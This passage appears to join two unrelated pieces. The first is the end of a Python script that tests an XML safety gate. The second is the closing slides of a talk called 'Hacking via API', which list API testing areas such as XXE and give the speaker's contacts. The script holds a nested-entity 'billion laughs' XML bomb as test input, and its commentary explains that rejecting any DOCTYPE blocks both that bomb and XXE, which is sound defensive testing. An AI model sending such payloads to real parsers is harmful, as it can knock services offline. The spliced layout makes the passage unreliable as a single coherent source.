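<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""

CLEAN_DOC = "<request><a>1</a><b>2</b><c>3</c></request>"


if __name__ == "__main__":
    for label, doc in (("xxe", XXE_DOC), ("bomb", BOMB_DOC), ("clean", CLEAN_DOC)):
        print(label, "accepted" if is_safe_xml(doc) else "rejected")
    print(parse_api_xml(CLEAN_DOC).findtext("b"))  # 2
```

The gate runs before `ET.fromstring`, so the parser that actually builds the tree never sees a DTD; rejecting the whole `<!DOCTYPE` is the same policy that `disallow-doctype-decl` implements in Java parsers and `resolve_entities=False` in lxml.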
57. Hacking via API
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]

58. Hacking via API
Thanks for your attention! Questions?
twitter.com/sergeybelove
sbelov@dsec.ru
Digital Security in Moscow: (495) 223-07-86
Digital Security in Saint Petersburg: (812) 703-15-47